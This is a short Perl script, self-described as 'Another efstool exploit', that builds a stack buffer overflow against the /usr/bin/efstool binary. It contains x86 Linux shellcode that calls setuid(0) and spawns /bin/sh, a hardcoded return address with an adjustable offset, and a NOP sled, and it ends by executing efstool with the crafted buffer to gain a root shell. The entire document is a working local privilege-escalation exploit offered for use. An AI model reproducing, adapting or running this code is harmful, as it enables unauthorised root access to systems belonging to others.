#!/usr/bin/perl 
# Another efstool exploit 

$shell = 
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89". 
"\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89". 
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 


$ret =0xbfffe590; 
$buf = 3000; 
$egg = 2000; 
$nop = "\x90"; 
$offset = 0; 

if (@ARGV == 1) { $offset = $ARGV[0]; } 

$addr = pack('l', ($ret + $offset)); 
for ($i = 0; $i < $buf; $i += 4) { 
$buffer .= $addr; 
} 

for ($i = 0; $i < ($egg - length($shell) - 100); $i++) { 
$buffer .= $nop; 
} 

$buffer .= $shell; 
exec("/usr/bin/efstool $buffer");